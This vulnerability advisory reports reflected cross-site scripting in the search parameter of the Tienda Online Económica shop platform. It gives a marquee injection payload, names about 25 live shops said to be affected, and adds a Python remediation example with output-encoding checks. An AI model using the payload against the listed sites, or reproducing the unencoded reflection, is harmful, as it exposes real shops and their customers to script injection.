Tienda-Online-Economica Cross Site Scripting

2013.08.12
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

+=============================================================================================+
+           Tienda-Online-Economica & XSS & Allow Execute Evil Remote Code                    +
+=============================================================================================+

Author(s): Ivan Sanchez
Product: Tienda online economica
Url vendor: http://www.tienda-online-economica.com
Date: 11/08/2013
Vendor Notified: 10/08/2013

Extract:
At Tienda Online Económica we offer you everything you need to have your online store ready to sell on the Internet in just 3 weeks. In addition, with Tienda Online Económica you get a unique, personalised design for your online store, tailored to selling your products and services on the Internet.

Exploitation Parameter and Function:
http://DOMAIN/es/search/0

Parameter Affected: q= XSS

Function Affected:
<form id="frm-search" action="http://www.site.com/es/search/0" class="grid_2 alpha omega" method="post">
<input id="q" name="q" type="text" value="<!-- HTML codes by Nullcode Team --> <marquee behavior="scroll" direction="left" scrollamount="10">Nullcode Team.</marquee> <marquee behavior="scroll" direction="left" scrollamount="40">Nullcode Team.</marquee> <marquee behavior="scroll" direction="left" scrollamount="50">Nullcode Team.</marquee> <marquee behavior="scroll" direction="left" scrollamount="60">Nullcode Team.</marquee> <marquee behavior="scroll" direction="left" scrollamount="70">Nullcode Team.</marquee>" />

The search term submitted in q is reflected into the value attribute of the input without encoding, so a double quote in the term closes the attribute and any markup that follows it is rendered by the browser.

Remediation: Sanitize all parameters

www.evilcode.com.ar & www.nullcode.com.ar
Hunting Security Bugs :-)

+=============================================================================================+
+           Tienda-Online-Economica & XSS & Allow Execute Evil Remote Code                    +
+=============================================================================================+

Examples of affected sites:
http://www.bienvenuebebe.es
http://www.armariodelujo.com
http://www.ifil.es
http://www.conqueletrita.com
http://www.ideariaid.com
http://www.quierotec.com
http://www.leonidas-chocoworld.com
http://www.k9barcelonastore.com
http://www.tutallernatural.com
http://www.vegaknits.com
http://www.borgiaconti.com
http://www.tuherbalonline.com
http://www.rayasdiving.com
http://www.kisscomixstore.com
http://www.energyfruits.es
http://www.culturaverde.es
http://www.romavionline.com
http://www.sinkoletas.com
http://www.tiendadelmusculo.com
http://www.aceiteshermida.com
http://www.sycbolsos.com
http://www.demar.es
www.suplementosdeportivosonline.com
http://www.pallarsgourmet.com
http://www.tusexshoponline.net
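The following Python example is added here to illustrate the remediation; it is not code from the advisory or from the vendor's product. It assumes a hypothetical server-side template for the search form quoted above (the application's real rendering code is not shown on the page), renders it once with the search term reflected unencoded, as the advisory describes, and once with the term encoded for an HTML attribute context with html.escape, and includes two checks a developer can keep as regression tests for the fix: that a term which needs encoding never comes back verbatim, and that the value attribute still decodes to exactly what the user typed. The sample term is the marquee markup shown in the advisory.

```python
import html
import re

# Constructed sample input: the marquee markup the advisory shows being
# reflected through the "q" search parameter.
SAMPLE_Q = '<marquee behavior="scroll" direction="left" scrollamount="10">Nullcode Team.</marquee>'

# Hypothetical server-side template for the search form quoted in the advisory;
# the real application's rendering code is not part of the advisory.
FORM_TEMPLATE = (
    '<form id="frm-search" action="/es/search/0" class="grid_2 alpha omega" method="post">'
    '<input id="q" name="q" type="text" value="{value}" />'
    '</form>'
)

VALUE_ATTR_RE = re.compile(r'value="([^"]*)"')
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z]")


def render_search_form_vulnerable(q: str) -> str:
    """Reflect the submitted search term into the value attribute unchanged.

    This is the CWE-79 pattern the advisory describes: a double quote in q
    closes the attribute and any markup that follows becomes part of the page.
    """
    return FORM_TEMPLATE.format(value=q)


def render_search_form_hardened(q: str) -> str:
    """Encode the search term for an HTML attribute context before reflecting it.

    html.escape(quote=True) turns & < > " ' into entities, so the term can
    never terminate the quoted attribute or introduce new elements.
    """
    return FORM_TEMPLATE.format(value=html.escape(q, quote=True))


def count_tags(markup: str) -> int:
    """Count tag-like tokens; a hardened response contains exactly the
    template's own tags no matter what the user submitted."""
    return len(TAG_RE.findall(markup))


def reflected_unencoded(rendered: str, q: str) -> bool:
    """Regression check for the fix: True when a term that needs encoding
    comes back verbatim in the response body."""
    return html.escape(q, quote=True) != q and q in rendered


def search_term_roundtrip(rendered: str) -> str:
    """Read the value attribute back and decode it; on a correctly encoded
    page this returns exactly what the user typed."""
    match = VALUE_ATTR_RE.search(rendered)
    return html.unescape(match.group(1)) if match else ""


if __name__ == "__main__":
    for name, render in (("vulnerable", render_search_form_vulnerable),
                         ("hardened", render_search_form_hardened)):
        page = render(SAMPLE_Q)
        print(f"{name}: tags={count_tags(page)} "
              f"unencoded={reflected_unencoded(page, SAMPLE_Q)} "
              f"roundtrip_ok={search_term_roundtrip(page) == SAMPLE_Q}")
```

The encoding is chosen for the context the value lands in (a double-quoted HTML attribute); a term reflected into a JavaScript string or a URL would need the encoding for that context instead, which is why "sanitize all parameters" in practice means output encoding at each point of reflection rather than a single input filter.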


Copyright 2024, cxsecurity.com